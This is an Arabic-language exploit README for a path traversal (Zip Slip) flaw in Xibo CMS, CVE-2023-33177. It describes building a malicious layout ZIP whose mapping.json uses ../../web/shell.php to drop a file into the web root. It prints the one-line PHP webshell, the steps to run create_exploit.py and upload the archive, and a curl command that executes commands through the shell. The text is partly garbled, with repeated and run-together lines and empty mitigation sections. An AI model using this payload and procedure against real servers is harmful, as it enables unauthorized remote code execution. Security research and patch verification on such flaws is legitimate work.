
يُظهر هذا الاستغلال ثغرة **اجتياز المسار** في Xibo CMS (CVE-2023-33177) التي تتيح تنفيذ التعليمات البرمجية عن بُعد عبر استيراد تخطيطات خبيثة.
يُظهر هذا الاستغلال ثغرة path traversal في Xibo CMS (CVE-2023-33177) تسمح بتنفيذ الأكواد عن بُعد من خلال استيراد تخطيطات خبيثة.
CVE/Advisory: CVE-2023-33177 الإصدارات المتأثرة:
نوع الثغرة: Path Traversal (Zip Slip) الأثر: Remote Code Execution (RCE)
يسمح Xibo CMS للمستخدمين المصادق عليهم باستيراد ملفات التخطيط عبر أرشيفات ZIP. تفشل وظيفة الاستيراد في التحقق بشكل صحيح من مسارات الملفات في ملف mapping.json، مما يسمح للمهاجم بكتابة ملفات خارج دليل المكتبة المخصص باستخدام تسلسلات path traversal (../../).
mapping.json: استخدام ../../web/shell.php كمسار للملفlibrary/../../web/shell.php/var/www/cms/web/shell.phpZip contains: library/../../web/shell.php
Xibo reads: library/ + ../../web/shell.php (from mapping.json)
Xibo writes: /var/www/cms/library/temp/ + ../../web/shell.php
Result: /var/www/cms/web/shell.php ← Webshell in web root!
python3 create_exploit.py
يُنشئ هذا ملف exploit.zip يحتوي على حزمة التخطيط الخبيثة.
xibo_admin / password)exploit.zipcurl 'http://localhost:8080/shell.php?cmd=id'
يحتوي ZIP الاستغلال على:
exploit.zip
├── layout.json # Valid Xibo layout definition
├── playlist.json # Empty playlist (triggers JSON import)
├── mapping.json # Contains path traversal payload
└── library/
└── ../../web/
└── shell.php # PHP webshell (gets extracted to web root)
الـ webshell المضمّن بسيط:
<?php system($_GET["cmd"]); ?>
الوصول إليه عبر: http://<target>/shell.php?cmd=<command>
الإصدارات المصححة:
استراتيجيات التخفيف:
.. أو المسارات المطلقةيُقدَّم هذا الاستغلال للأغراض التالية:
لا تستخدم هذا الاستغلال ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.
complexusprada نوفمبر 2025